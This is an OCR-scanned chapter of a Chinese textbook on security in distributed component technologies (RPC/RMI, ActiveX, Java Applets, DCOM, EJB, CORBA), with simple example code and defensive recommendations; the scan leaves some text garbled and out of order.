ActiveX 是 微软 技术 系列 中 提供 的 一 种 控件 开发 模型 ,将 组 件 或 对 象 打包 ,提高 了 
程序 的 重用 性 ; JavaApplet 是 采用 Java 创建 的 基于 HTML 的 程序 ,浏览 器 将 其 暂时 
下 载 到 用 户 的 硬盘 上 ,并 在 Web 页 打开 时 在 本 地 运行 。 本 章 对 这 两 种 技术 也 进行 了 安 
全 方面 的 讲解 。 

DCOM 是 在 微软 技术 系列 中 ,以 RPC 为 基础 思想 建立 的 组 件 模 型 ,能 让 组 件 以 可 
靠 、 安 全 和 高 效 的 方式 进行 网 络 通信 ; EJB 是 Sun 系列 中 以 下 MI 为 基础 思想 建立 的 服 
务 器 端 组 件 模型 ,也 能 部 署 分 布 式 应 用 程序 ,并 能 充分 利用 Java 跨 平 台 的 优势 。 本 章 
对 这 两 种 技术 进行 了 安全 方面 的 阐述 。 

CORBA 由 OMG 组 织 制定 ,是 OMG 为 解决 分 布 式 处 理 环 境 中 ,不 同 平台 、 不 同 语 
言 甚至 不 同 硬件 系统 之 间 的 通信 而 提出 的 一 种 解决 方案 。 本 章 最 后 对 CORBA 安全 进 
行 了 讲解 。 


10.1 远程 调用 安全 


10.1.1 远程 调用 概述 


传统 的 网 络 分 布 式 程序 需要 进行 复杂 的 底层 通信 编程 ,但 是 有 了 远程 过 程 调 用 
(Remote Procedure Call, RPC) 中 之 后 ,开发 网 络 分 布 式 应 用 程序 更 加 容易 了 。RPC 的 
出 现 , 让 开发 者 不 需要 了 解 底层 网 络 通信 协议 ,直接 通过 网 络 从 远程 计算 机 程序 上 请 求 
服务 。 该 技术 在 1981 年 由 B.J. Nelson 在 其 博士 论文 中 提出 ,后 被 开放 式 软件 基金 会 
(OSF) 制 定 为 分 布 式 计算 环境 (DCE) 的 分 布 式 计算 标准 。 
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RPC 通信 模型 是 基于 客户 / 服务 器 通信 模型 的 ,是 一 种 同步 通信 方式 , 即 调用 方 必 
须 等 待 服务 器 响应 。 在 客户 端 ,RPC 为 远程 过 程 提 供 了 抽象 ,在 调用 时 ,其 底层 消息 传 
递 机 制 对 客户 来 说 都 是 透明 的 。 

在 Java 系列 中 ,RMI(Remote Method Invocation) 技 术 是 远程 过 程 调用 的 一 种 实 
现 。RMI 使 用 Java 远程 消息 交换 协议 (Java Remote Messaging Protocol,JRMP) 进 行 
通信 。 用 Java RMI 开 发 的 应 用 系统 可 以 部 署 在 任何 支持 Java 运行 环境 的 平台 上 。 

图 10-1 是 RPC/RMI 通信 过 程 。 


运行 环境 运行 环境 


客户 端 程序 | 服务 器 端 过 程 | 


1 4 1 


4 
存根 (Stub) 存根 (Skeleton) 


图 10-1 


从 图 10-1 中 可 以 看 出 ,在 RPC 中 ,服务 以 过 程 的 形式 放 在 服务 器 端 ,客户 负责 请 


求 服务 ,服务 器 执行 客户 的 请 求 , 运 行 被 调用 的 过 程 。RPC 在 整个 调用 过 程 中 需要 经 
| 过 的 步骤 如 下 : 


， 息 的 返回 ， 


(1) 客户 端 请 求 进 行 远程 调用 ,激活 客户 端 存根 ,指定 目标 服务 器 ; 
(2) 客户 端 存根 将 被 调用 的 过 程 和 参数 打包 ,作为 消息 发 送 给 服务 器 ,等 待 数据 消 


(3) 服务 器 接收 消息 ,服务 器 存根 根据 消息 中 的 过 程 和 参数 等 信息 ,调用 服务 器 端 
的 过 程 ; 

(4) 服务 器 将 结果 作为 消息 返回 给 客户 端 存 根 ; 

(5) 客户 端 存根 将 结果 返回 给 用 户 。 

什么 情况 下 适合 使 用 远程 调用 呢 ? 举 一 个 例子 , 某 公司 内 部 办 公 系 统 的 结构 如 
图 10-2 所 示 。 


客户 端 桌面 
应 用 程序 [ee 
客户 端 桌面 
应 用 程序 


图 10-2 
客户 端 使 用 桌面 应 用 程序 。 很 显然 ,为 了 应 对 数据 库 的 迁移 或 改变 ,访问 数据 库 的 


代码 不 应 该 写 在 客户 端 ,否则 会 造成 大 量 客户 端的 改变 。 此 时 ,访问 数据 库 的 代码 写 在 


服务 器 端 ,作为 一 个 方法 或 过 程 的 形式 对 外 发 布 , 客 户 端 可 在 不 知道 服务 器 细节 ,也 不 
知道 底层 通信 协议 的 基础 上 ,访问 服务 器 端的 这 些 方法 ,就 好 像 调用 自己 机 器 上 的 方法 
一 样 。 如 果 用 Java 实现 ,就 可 以 使 用 RMI 技术。 当然,RMI 还 有 很 多 其 他 功能 ,读者 
可 以 参考 相应 文献 。 
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以 上 面 应 用 为 例 , 服 务 器 端 访问 数据 库 ( 如 查询 ) 的 代码 模拟 如 下 ; 


P10_01_Query. java 


import java. rmi. RemoteException; 
import java. rmi. server. UnicastRemoteObject; 


public class P10_01 Query extends UnicastRemoteObject implements 
P10 _01 QueryInterface 
E 
public P10_01 Query() throws RemoteException {} 
public String query() throws RemoteException 
{ 
// 查询 数据 库 代码 
return "查询 结果 "; 


P10_01_QueryInterface. java 


import java. rmi. Remote; 
import java. rmi. RemoteException; 


public interface P10_01 QueryInterface extends Remote 
{ 

public String query() throws RemoteException; 
} 


很 显然 ,服务 器 端的 P10_01_QueryInterface 接口 内 并 没有 核心 代码 。 接 下 来 将 服 
务 器 对 象 对 外 发 布 : 


P10_01_RunServer. java 


import java. rmi. Naming; 


public class P10_01_RunServer 
{ 
public static void main(String[ ] args) throws Exception 
{ 
P10_01_ QueryInterface queryInterface = new P10_01 Query(); 
// 启动 注册 表 
Runtime. getRuntime( ) . exec("rmiregistry"); 
// 将 这 个 对 象 起 一 个 JNDI 名 称 , 放 和 注册 表 
Naming. rebind( "queryInterface", queryInterface); 
} 
} 


运行 ,服务 器 端的 对 象 即 对 外 发 布 。 | 
客户 端 得 到 服务 器 端 发 布 的 接口 ,然后 远程 调用 服务 器 端的 方法 : 
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P10_01_Client. java 


import java. rmi. Naming; 


public class P10_01 Client 
{ 
public static void main(String[ ] args) throws Exception 
{ 
P10_01 QueryInterface queryInterface = 
(P10_01 QueryInterface)Naming. lookup("rmi://127.0.0.1/queryInterface"); 
String result = queryInterface. query(); 
System. out. println(result); 
} 
下 


运行 , 即 可 调用 服务 器 端的 query 方法 。 

从 上 面 的 例子 可 以 看 出 ,客户 端 无 须知 道 服务 器 端的 核心 代码 ,只 需要 知道 接口 即 
当然 ,在 该 例子 中 ,省 略 了 底层 的 一 些 通信 细节 的 支持 类 。 

以 上 例子 同时 说 明了 RPC 的 其 他 好 处 : 

(1) 给 程序 在 异 构 环 境 下 进行 通信 提供 了 可 能 , 异 构 主 要 可 以 体现 在 : 

。 网 络 环境 中 的 多 种 硬件 系统 平台 ; 

。 硬件 平台 上 的 不 同 的 系统 软件 ; 

。 不 同 的 网 络 协议 或 网 络 体系 结构 连接 ,等 等 。 

(2) 在 异 构 网 络 环境 下 ,需要 把 分 散在 各 地 的 计算 机 系统 集成 起 来 ,充分 利用 系统 
中 分 散 的 计算 资源 ,由 网 络 中 的 多 台 计 算 机 协同 工作 完成 某 一 任务 ,RPC 也 给 这 种 需 


可 


o 


。 求 的 实现 提供 了 可 能 。 


10.1.2 安全 问题 
RPC 提供 了 具有 强大 的 网 络 编程 功能 ,给 编程 带 来 了 极 大 方便 ,并 为 分 布 式 计算 


提供 了 支持 ,但 是 还 存在 一 些 安全 问题 。 主 要 体现 在 : 


(1) 攻击 者 可 能 会 恶意 地 调用 RPC 服务 器 中 的 过 程 ,或 者 输入 一 些 恶意 的 数据 导 


。 臻 服务 器 失效 。 


由 于 RPC 处 理 过 程 中 ,底层 使 用 的 仍然 是 TCP/IP 协议 ,而 TCP/IP 协议 本 身 存 
在 缓冲 区 溢出 的 问题 ,攻击 者 就 有 可 能 利用 这 一 漏洞 ,对 系统 进行 攻击 。 一 般 情况 下 ， 


RPC 使 用 的 是 135 端口 (RMI 使 用 的 是 1099)。 攻 击 者 可 伪装 成 合法 客户 端 ,向 RPC 
| 端口 传送 信息 ,并 让 该 信息 溢出 服务 器 端的 RPC 缓冲 区 ,如 果 客 户 端 发 送 的 信息 经 过 


了 精心 的 设计 ,那么 很 有 可 能 加 入 恶意 代码 。 
通常 ,如 果 服 务 器 被 攻击 ,一些 基于 RPC 的 服务 ,如 DCOM ,都 将 无 法 正常 运行 。 


。 更 有 甚 者 ,攻击 者 有 可 能 获得 对 远程 服务 器 的 完全 控制 ,对 服务 器 随意 执行 操作 ,如 安 
， 装 程序 、 算 改 数据 ,格式 化 硬盘 、 创 建 用户 或 增加 权限 等 。 


通常 利用 以 下 方法 来 解决 此 问题 : 
。 利用 防火 墙 封 堵 端 口 。 可 以 设置 防火 墙 的 分 组 过 滤 规 则 ,过 滤 掉 RPC 端口 和 
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影响 到 DCOM 函数 调用 的 数据 包 , 通 过 这 种 方法 ,可 以 避免 防火 墙 内 的 系统 被 


外 部 攻击 。 

临时 禁用 某 些 服务 ,如 DCOM。 如 果 因 为 一 些 特殊 原因 无 法 过 滤 RPC 端口 ,也 
可 临时 关闭 DCOM 服务 ,来 保证 网 络 安全 。 不 过 ,该 方法 将 会 导致 系统 运行 异 
常 ,因此 一 般 不 建议 使 用 。 有 关 方 法 大 家 可 以 参考 相关 文档 。 


进行 自 改 。 


因为 在 RPC 通信 和 机制 中 ,调用 组 件 和 返回 客户 信息 都 是 通过 传送 消息 进行 ,由 于 


消息 在 传送 过 程 中 采取 的 安全 措施 是 比较 简单 ,因此 很 容易 被 非法 用 户 截获 ,造成 信息 
为 了 保证 网 络 系统 中 的 消息 信息 的 安全 ,可 以 采用 数据 加 密 和 解密 的 方法 来 实现 。 
这 里 可 以 采用 加 密 解 密 与 数字 签名 来 实现 ,该 方法 在 后 面 的 章节 中 将 会 有 详细 的 叙述 。 


10.2 ActiveX 安全 
10.2.1 ActiveX 概述 


ActiveX[ ,也 称 ActiveX 插件 .组 件 或 者 控件 ,为 开发 人 员 和 用 户 提供 了 一 个 快速 
而 简便 的 方法 ,将 某 些 内 容 和 功能 集成 在 一 起 。 它 是 一 些 软件 组 件 或 对 象 的 集合 ,可 以 


被 重用 地 包含 在 应 用 程序 中 执行 。 以 Web 网 页 为 例 ,ActiveX 组 件 实际 上 是 一 些 可 执 | 
行 的 代码 的 集合 ,可 以 复 用 ,这 些 可 复 用 的 组 件 可 以 被 嵌入 到 网 页 中 , 当 客 户 请 求 时 ,被 
客户 端 浏览 器 下 载 , 在 客户 端 执行 。 一 般 这 个 组 件 可 以 为 EXE 文件 .DLL 文件 或 者 


OCX 文件 等 。 
随 着 Web 程序 的 发 展 ,ActiveX 在 Web 中 的 应 用 越 来 越 广泛 ,在 缓解 B/S 模式 服 
务 器 端 负担 方面 ,作出 了 较 大 贡献 。 比 如 ,在 一 个 股票 查询 页 面 中 ,用 户 希 望 得 到 以 某 


种 图 表 形 状 显 示 的 结果 ,传统 的 Web 程序 中 ,该 图 表 必 须 由 服务 器 根据 查询 的 数据 生 
成 之 后 送 给 客户 。 由 于 图 片 占 用 空间 较 大 ,因此 服务 器 端的 响应 很 慢 , 给 客户 一 个 不 好 | 


的 用 户 体 验 。 如 果 使 用 ActiveX, 则 可 以 将 画 出 各 种 图 表 的 功能 写 在 ActiveX 内 ,客户 
查询 时 ,该 控件 被 下 载 并 注册 到 客户 系统 上 ,服务 器 只 需 将 查询 的 结果 数据 传递 给 客户 
端 ,图 表 生 成 工作 由 客户 机 上 的 ActiveX 控件 来 完成 ,大 大 减少 了 用 户 等 待 时 间 ,减轻 
了 网 络 带 宽 的 压力 ,释放 了 服务 器 的 负担 。 

以 Web 程序 为 例 ,ActiveX 的 运行 过 程 如 图 10-3 所 示 。 


客户 端 
浏览 器 ActiveX 
运行 ActiveX 控 件 .OCX 


图 10-3 


(2) 客户 端 和 服务 器 之 问 传递 的 信息 可 能 被 窃听 ,攻击 者 可 能 会 对 传输 中 的 数据 | 
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由 于 具有 可 重用 性 方面 的 优势 ,ActiveX 被 广泛 应 用 ,ActiveX 的 开发 工具 逐日 增 
加 。 由 于 在 Microsoft 系列 中 ,ActiveX 不 依赖 于 语言 ,所 以 传统 的 开发 工具 基本 上 都 
能 开发 。 如 Delphi、Visual Basic、Visual C++、. NET 等 ,都 可 以 成 为 ActiveX 的 开发 工 
具 , 整 个 过 程 比较 简单 。 

不 过 ,目前 ,只 有 Windows 系列 的 操作 系统 才 支 持 ActiveX 的 运行 ,在 浏览 器 方 
面 , 也 只 有 正 提供 了 对 ActiveX 的 有 效 支持 。 如 果 使 用 的 是 其 他 浏览 器 的 话 ,必须 配 


， 置 第 三 方 所 提供 的 插件 才能 支持 ActiveX 控件 。 


。 进行 设置 ,如 图 10-4 所 示 。 


10.2.2 安全 问题 


如 前 所 述 ,ActiveX 控件 实际 上 就 是 一 个 可 执行 文件 ,提供 了 特定 功能 ,具有 某 些 
属性 、 某 些 方法 ,甚至 具备 外 界 可 以 捕获 的 事件 ,方便 了 应 用 的 开发 和 执行 。ActiveX 
的 安全 问题 主要 体现 在 : ActiveX 控件 由 于 可 以 被 蔡 入 到 某 些 程序 中 ,因此 可 能 在 客户 
的 计算 机 上 运行。 如 果 攻 击 者 在 ActiveX 内 编写 一 些 恶意 代码 ,就 可 能 在 用 户 执 行 这 
个 ActiveX 时 ,攻击 其 计算 机 。 如 : 

。 客户 运行 程序 时 .不知 不 觉 被 格式 化 硬盘 ; 

。 客户 浏览 网 页 时 ,注册 表 被 修改 ; 

。 客户 的 保密 信息 被 后 门 传 往 攻击 者 的 服务 器 ; 

。 客户 硬盘 被 共享 ,等 等 。 

该 问题 一 般 出 现在 Web 程序 中 ,对 于 用 户 来 说 ,可 以 通过 以 下 方法 解决 : 

(1) 在 使 用 ActiveX 控件 时 ,必须 确认 其 签名 ; 

(2) 不 能 让 ActiveX 控件 被 自动 下 载 ,下 载 前 必须 有 提示 ; 

(3) 不 下 载 未 签名 的 ActiveX 控件 ; 

(4) 如 果 要 求 非常 严格 ,可 以 禁用 任何 ActiveX 控件 ,等 等 。 

具体 的 做 法 ,可 以 在 I 下 的 “工具 ”>“Internet 选项 ”> 安全 ”中 的 “ 自 定义 级 别 ” 中 


加 如 
设置 GE): 
鸭 ActiveX 控件 和 插件 和 | 
图 Activex 控件 自动 提示 

@@ 禁用 到 


@ 〇 月 用 
图 对 标记 为 可 安全 执行 脚本 的 ActiveX 控件 执行 脚 z 
〇 禁用 


3 归 
示 ”| 
ee i 
重 置 自 定义 设置 

重 置 为 中: | 安全 级 - 中 了 ] 重 置 @) 


Ea 
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10.3 JavaApplet 安全 


10.3.1 JavaApplet 概述 


同 ActiveX 在 Web 程序 中 的 应 用 一 样 ,Java 系列 也 推出 了 相应 的 技术 , 那 就 是 
JavaApplet。JavaApplet 是 用 Java 语言 编写 的 ,基于 HTML 的 小 应 用 程序 ,也 可 以 直 
接 嵌 入 到 网 页 中 ,并 能 够 产生 特殊 的 效果 。 当 客户 端 访问 服务 器 Web 页 时 ,客户 端 浏 
览 器 就 会 下 载 JavaApplet, 将 其 暂 存 到 用 户 的 硬盘 上 ,并 以 一 定 的 生命 周期 在 本 地 
运行 。 

关于 JavaApplet 的 基本 知识 ,读者 可 以 参考 相关 文档 。 

JavaApplet 的 运行 过 程 如 图 10-5 所 示 。 


服务 器 


pr 
浏览 器 Web Applet 
响应 组 件 jar,.clas 


运行 Applet 类 


图 10-5 


不 过 ,要 使 用 JavaApplet, 其 前 提 是 用 户 使 用 的 浏览 器 必须 支持 Java, 这 可 以 通过 
安装 一 些 Java 运行 插件 来 实现 ,当前 流行 的 网 络 浏览 器 ,基本 上 都 可 以 通过 一 些 手段 
让 其 支持 Java。 

同样 ,以 上 节 的 股票 查询 系统 为 例 ,将 图 表 生 成 的 工作 交 给 JavaApplet 在 客户 端 
实现 ,也 可 以 减少 用 户 等 待 时 间 , 减 轻 网 络 带宽 的 压力 ,释放 服务 器 的 负担 。 

以 下 是 一 段 简单 的 Applet 代码 : 


P10_02. java 


import java.awt. x*; 
import java.applet. *; 
public class P10_02 extends Applet 
{ 
public void paint (Graphics g ) 
, 
g. setColor(Color. blue); 
g. drawRoundRect(45, 35, 250, 20,10,10); 
g. setColor(Color. red); 
g.drawString(" 这 是 一 个 Applet!",100,50); 


} 


编译 , 接 下 来 在 一 个 网 页 文件 中 嵌入 其 . class 文件 : 
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<HIML> 

< TITLE> Applet Use </TITLE> 

< APPLET CODE = "P10_02. class" WIDTH = 400 HEIGHT = 100> 
</APPLET> 

</HTML> 


P10_02. html 


运行 该 网 页 ,效果 如 图 10-6 所 示 。 


10.3.2 安全 问题 { 这 是 一 个 Appletl 


由 于 Java 是 一 门 安全 性 要 求 很 高 的 语言 ,因此 ， 


JavaApplet 安全 性 比 ActiveX 要 好 一 些 , 默 认 情 况 下 ,JavaApplet 的 安全 限制 如 下 。 


(1) Applet 放 在 客户 端 ,但 是 不 能 在 客户 端 执行 任何 的 可 执行 文件 ; 

(2) Applet 不 能 读 写 客户 端 文件 系统 中 的 文件 ; 

(3) 在 通信 方面 ,Applet 只 能 与 它 下 载 的 源 服务 器 进行 通信 ,而 不 能 与 网 络 上 其 他 
机 器 通信 ; 

(4) 在 获取 敏感 信息 方面 ,Applet 只 能 获取 客户 端 计算 机 的 部 分 信息 ,如 操作 系统 
名 称 和 版 本 号 、 文 件 及 路 径 分 隔 符 等 ,而 不 会 泄露 其 他 敏感 信息 ,如 注册 表 、 系 统 安全 配 
置 等 ; 

(5) 此 外 ,Applet 还 可 通过 数字 签名 进行 不 同 的 安全 授权 ; 关于 数字 签名 的 知识 ， 


。 后 面 的 章节 具有 详细 的 叙述 。 


因此 ,对 Applet 的 安全 问题 ,可 以 考虑 得 简单 一 些 。 
10.4 DCOM 安全 


10.4.1 DCOM 概述 


分 布 式 组 件 对 象 模型 (Distributed Component Object Model, DCOM), 是 
Microsoft 技术 系列 中 推出 的 一 种 远程 组 件 调 用 模型 , 它 的 底层 实现 是 基于 RPC 的 。 
实际 上 ,DCOM 是 组 件 对 象 模型 (Component Object Model,COM) 的 进一步 扩展 。 在 
DCOM 体系 结构 中 ,具有 两 个 重要 的 参与 者 : 

(1) 服务 器 端 。 服务 器 端 实现 具体 的 业务 逻辑 ,对 外 提供 接口 ,以 服务 的 形式 
发 布 。 

(2) 客户 端 。 客 户 端 程序 对 象 能 够 请 求 服务 器 上 发 布 的 服务 ,调用 接口 ,实际 上 调 
用 服务 器 端的 业务 逻辑 。 

服务 器 端 和 客户 端 程序 可 以 不 在 同一 台 机 器 上 。DCOM 客户 端 对 服务 器 端的 调 
用 相对 简单 ,不 用 考虑 底层 网 络 协议 的 细节 ; 而 服务 器 端 也 不 需要 考虑 数据 怎样 传输 
给 客户 端 ,只 需 集中 精力 于 业务 逻辑 的 编写 。 

因此 ,可 以 说 DCOM 为 局 域 网 .广域网 甚至 Internet 上 不 同 计算 机 对 象 之 间 的 通 
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信和 提供 了 一 个 良好 的 模型 。 特 别 是 对 于 分 布 式 计算 的 情况 ,使 用 DCOM 可 以 达到 良好 


的 效果 ,满足 应 用 的 需求 。 
另外 ,DCOM 在 配置 上 也 比较 方便 。 客 户 端 和 服务 器 的 通信 过 程 中 ,如 果 要 改变 


两 者 之 间 的 连接 或 通信 方式 ,DCOM 无 须 改变 源码 ,也 无 须 重新 编译 程序 ,只 需要 改变 


配置 即 可 。 
以 一 个 典型 的 远程 调用 服务 的 项 目 为 例 ,DCOM 运行 的 基本 架构 如 图 10-7 所 示 。 


图 10-7 


在 该 架构 中 ,应 用 服务 器 和 DCOM 服务 器 不 在 同一 台 机 器 上 ,两 者 之 间 通 过 接口 
进行 通信 。 

在 Microsoft 系列 中 ,DCOM 是 与 语言 无 关 的 ,很 多 语言 都 可 以 用 来 创建 DCOM 
组 件 ,如 Java、Visual C++、VB、Delphi 等 也 都 可 以 很 好 地 和 DCOM 发 生 相 互 作 用 。 由 
于 DCOM 的 语言 独立 性 ,应 用 系统 开发 人 员 可 以 选择 自己 最 熟悉 的 语言 和 工具 进行 
开发 。 


10.4.2 安全 问题 


DCOM 的 安全 问题 主要 体现 在 以 下 几 个 方面 : 

(1) DCOM 充分 使 用 了 Windows NT 提供 的 安全 框架 。 因 此 ,原则 上 讲 , 在 服务 
器 端 组 件 和 客户 端 ,DCOM 无 须 进行 安全 性 设计 和 编码 工作 ,就 可 以 为 分 布 式 应 用 提 
供 安 全 性 保障 。 因 此 ,可 以 说 ,默认 情况 下 ,DCOM 提供 了 一 个 有 效 的 安全 性 机 制 , 开 
发 人 员 在 开发 分 布 式 应 用 时 ,不 需要 担心 安全 问题 。 


(2) 对 于 某 些 应 用 系统 ,如 果 需 要 确定 方法 级 的 用 户 访问 控制 , 则 使 用 组 件 级 的 访 
问 控 制 列表 就 不 够 了 。 如 一 个 DCOM 中 有 两 个 方法 : 查看 事务 和 修改 事务 ,这 两 个 方 | 


法 的 访问 权限 由 不 同 的 用 户 持 有 ,此 种 情况 下 ,安全 策略 为 : 
。 将 所 有 的 用 户 名 以 及 其 许可 和 策略 保存 在 数据 库 内 ; 
。 当 客 户 端 调用 一 个 方法 时 ,服务 器 端 组 件 获 取 其 用 户 名 ,在 自己 的 数据 库 中 查 
找 有 关 的 许可 和 策略 ; 


些 操作 。 
> 提示 “用 户 的 许可 和 策略 保存 在 数据 库 中 ,用 户 不 必要 为 其 安全 性 担心 ,因为 用 
到 的 是 Windows NT 内 置 的 安全 性 框架 。 
由 于 篇 幅 所 限 ,本 章 不 对 DCOM 安全 问题 进行 更 加 深入 的 研究 ,读者 可 以 参考 相 
关 文 献 。 
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根据 客户 端的 身份 ,服务 器 端 组 件 仅仅 执行 允许 该 客户 执行 的 安全 对 象 中 的 某 
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10.5 EJB 安 全 
，10.5.1 EJB 概述 


企业 级 Java Bean(Enterprise Java Bean,EJB) 是 Sun 公司 技术 系列 中 提供 的 服务 
| 器 端 组 件 模型 ,也 可 以 用 于 部 署 分 布 式 应 用 程序 。 由 于 它 具 有 器 平台 的 优点 ,在 大 型 系 
| 统 和 对 事务 要 求 较 高 的 系统 中 比较 常见 。EJB 是 JavaEE 的 一 部 分 ,基于 Java 技术 , 定 
。 义 了 一 个 开发 分 布 式 应 用 程序 的 标准 。 
| 当 软 件 系 统 的 规模 扩大 之 后 ,传统 的 两 层 结构 难于 维护 ,而 EJB 的 使 用 ,促进 了 多 
| 层 结构 的 发 展 ,使 得 层 与 层 之 间 的 耦合 性 大 大 降低 。EJB 是 中 间 件 的 一 种 实现 方式 ,和 
| 其 他 中 间 件 相 比 ,EJB 还 具有 如 下 优点 : 
。 对 象 缓存 机 制 。 在 访问 量 较 大 ,对 性 能 要 求 较 高 的 系统 中 ,对 象 缓存 机 制 能 够 
大 大 提高 系统 性 能 ,但 是 程序 员 如 果 自 己 编写 对 象 缓存 机 制 , 要 考虑 到 很 多 底 
层 的 安全 问题 ,并 不 容易 (如 要 考虑 线程 安全 和 并 发 控制 等 问题 ) ,可 能 将 其 精 
力 从 业务 逻辑 的 编写 中 分 散 出 去 。 而 EJB 容器 中 提供 了 自动 的 对 象 缓存 机 制 ， 
无 须 另 外 编写 代码 ,就 可 以 利用 服务 器 的 特性 。 
事务 机 制 。 同 样 ,在 安全 性 要 求 较 高 的 系统 中 ,事务 控制 关系 到 系统 的 稳定 ,如 
果 程 序 员 自己 编写 事务 程序 ,也 比较 消耗 精力 ,并 且 不 容易 编写 得 很 安全 。 
EJB 提供 了 非常 全 面 的 事务 机 制 ,程序 员 只 需要 简单 配置 事务 控制 策略 ,也 不 
需要 编写 任何 代码 。 
EJB 分 为 3 类, 分别 是 ， 
(1) 会 话 Bean(Session Bean) 。 会 话 Bean 用 于 实现 业务 逻辑 ,可 以 设置 为 有 状态 
的 ,也 可 以 设置 为 无 状态 的 。 
(2) 实体 Bean(Entity Bean) 。 实 体 Bean 用 于 实现 对 象 关系 映射 ,将 数据 库 表 中 的 记 
录 映 射 为 内 存 中 的 Bean 对 象 。 对 Bean 的 实例 化 .删除 ,修改 、 查 询 能 够 和 数据 库 同步 。 
| (3) 消息 驱动 Bean(MessageDriven Bean。 消 息 驱 动 Bean 能 够 接收 客户 端 发 送 的 
”JMS 消息 然后 处 理 , 实 现 异 步 的 功能 调用 。 
| EJB 中 ,组 件 之 间 也 是 用 接口 进行 通信 的 。 以 EJB 2. 0 远程 接口 调用 EJB 对 象 为 
例 ,EJB 的 运行 过 程 如 图 10-8 所 示 。 
关于 EJB 编写 的 一 些 其 他 问题 ,读者 可 以 参考 相关 文档 。 


10.5.2 开发 安全 的 EJB 


EJB 开发 过 程 中 的 安全 问题 体现 在 以 下 几 个 方面 : 

(1) 由 于 EJB 容器 已 经 提供 了 较 好 的 安全 保障 ,理论 上 讲 ,EJB 的 业务 方法 源 代码 
中 ,不 应 该 包含 与 安全 相关 的 逻辑 。 

(2) EJB 可 以 提供 对 受 保护 资源 的 受 控 访问 。 对 于 组 件 级 别 的 授权 和 身份 验证 ， 
可 以 在 EJB 打包 时 的 部 署 描 述 符 中 配置 。 
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服务 器 端 


2. 返回 home 引 用 | ds | 
3. 请 求 远程 接口 本 
客户 端 home 接 口 
4. 返回 EJB 对 象 
! 远程 接口 
5. 调用 业务 方法 Ce ) 
10-8 


(3) EJB 中 允许 设置 其 安全 角色 ,部 署 EJB 时 ,将 安全 角色 映射 到 安全 标识 (如 用 
户 标识 或 用 户 组 等 ) ,这 样 可 以 批量 设置 对 某 些 资源 的 访问 。 安 全 角色 通常 也 在 部 署 的 
描述 符 中 配置 。 以 下 例子 中 指定 了 两 个 安全 角色 : customer 和 admin。 


<assembly— descriptor> 
< security— role> 
< description > customer </desciption> 
<role— name> customer< role 一 name> 
</security— role> 
<security— role> 
< description > admin </desciption> 
<role- name>admin<role- name> 
</security— role> 


</assembly - descriptor > 


(4) EJB 中 允许 声明 调用 某 个 方法 的 权限 ,来 确定 某 些 方法 只 能 由 某 些 角色 调用 。 
该 声明 也 是 在 部 署 描述 符 中 进行 : 


<method — permission> 
<role- name> customer </role— name> 
<method> 
<ejb - name> CustomerService </ejb— name> 
<method— name> * </method— name> 
</method> 
<method> 
<ejb- name> PayService </ejb— name> 
< method — name > getBalance </method - name> 
</method> 
</method — permission> 
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上 面 的 配置 说 明 ,customer 角色 可 以 访问 CustomerService 内 的 所 有 方法 ,能 访问 
PayService 中 的 getBalance 方法 。 
(5) 在 EJB 中 ,也 可 以 利用 编程 的 方法 来 实现 安全 管理 。 


优 下 ”” ”EJB 层 中 的 编程 安全 方法 由 context 调用 ,主要 包括 以 下 方法 。 
| 。 getCallerPrincipal: 返回 java. security. Principal 对 象 ,封装 了 EJB 的 调用 者 ; 
可 以 用 Principal 的 getrName 方法 得 知 用 户 名 。 
| 。 isCallerInRole: 传人 一 个 用 户 名 ,返回 一 个 布尔 类 型 的 变量 ,用 于 确定 调用 者 
的 角色 。 


10.6 CORBA 安全 


10.6.1 CORBA 概述 


| 公共 对 象 请 求 代理 体系 结构 5 (Common Object Request Broker Architecture， 

| CORBA) 是 一 种 标准 的 面向 对 象 应 用 程序 体系 规范 。CORBA 由 对 象 管理 组 织 (Object 

”Management Group,OMG) 组 织 制定 ,是 OMG 为 解决 分 布 式 处 理 环境 中 ,不 同 平台 、 
不 同 语言 甚至 不 同 硬件 系统 之 间 的 通信 而 提出 的 一 种 解决 方案 。 


六 提示 。OMG 组 织 是 一 个 国际 性 的 非 列 利 组织 , 其 职责 是 制定 工业 指南 和 对 象 管 
理 规范 ,为 应 用 开发 提供 一 些 公 共 框 架 。 


CORBA 实际 上 是 由 对 象 管理 组 织 设立 一 组 编程 标准 。 在 这 个 标准 中 ,定义 了 一 
系列 API 和 通信 协议 ,用 于 达到 以 下 目标 : 

。 不 同 语言 编写 的 应 用 程序 可 以 通信 

。 不 同 平台 下 的 应 用 程序 可 以 通信 ; 

。 对 于 编程 人 员 来 说 ,通信 的 底层 细节 是 封装 起 来 的 ,等 等 。 

CORBA 实际 上 实现 了 不 同 语言 之 间 的 通信 。 在 编写 程序 的 过 程 中 ,CORBA 中 提 
供 了 IDL 编译 器 ,能 够 将 不 同 语言 编写 的 程序 转换 成 统一 的 IDL 接口 进行 发 布 ,IDL 
接口 之 间 可 以 实现 通信 。 以 Java 客户 端 和 C++ 服务 器 端 进行 通信 为 例 , 图 10-9 展示 了 


其 通信 过 程 。 
客户 端 
Java 程 序 
服务 器 端 
C++ 程序 


图 10-9 
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EB 
CORBA 标准 主要 分 为 3 个 层次 : 
(1) 对 象 请 求 代理 ORB。 处 于 CORBA 最 底层 ,在 ORB 中 规定 了 分 布 对 象 的 定义 
和 语言 映射 与 对 象 间 通 信 的 实现 。 
(2) 公共 对 象 服务 。 处 于 在 ORB 之 上 ,定义 了 若干 公共 服务 ,如 命名 服务 .并 发 服 
务 .安全 服务 .事务 服务 等 。 


(3) 公共 设施 。 处 于 CORBA 体系 最 上 层 ,定义 了 组 件 框架 ,提供 的 服务 可 以 直接 | 


被 业务 对 象 使 用 。 
10.6.2 CORBA 安全 概述 


在 CORBA 的 调用 中 ,对 对 象 的 安全 调用 是 最 关键 的 。CORBA 安全 主要 体现 在 
以 下 几 个 方面 : 
(1) CORBA 体系 结构 中 ,已 经 建立 了 一 个 完整 的 体系 结构 来 支持 各 种 安全 功能 。 


CORBA 安全 规范 中 定义 了 许多 接口 来 完成 这 些 安全 方面 的 操作 或 定义 。 由 于 这 些 接 ， 


口 的 实现 过 程 比较 复杂 ,因此 都 是 封装 起 来 的 ,对 外 提供 接口 ,让 用 户 调用 时 比较 方便 。 

(2) CORBA 支持 安全 策略 和 安全 域 的 定义 。 安 全 策略 和 安全 域 对 系统 的 安全 需 
求 进行 划分 ,是 具体 安全 措施 执行 的 基础 。 其 中 ,安全 策略 定义 了 对 象 的 访问 控制 、 授 
权 , 不 可 否认 性 等 安全 保护 规则 ,是 限制 对 象 的 活动 .确保 系统 安全 的 重要 保证 ; 一 般 
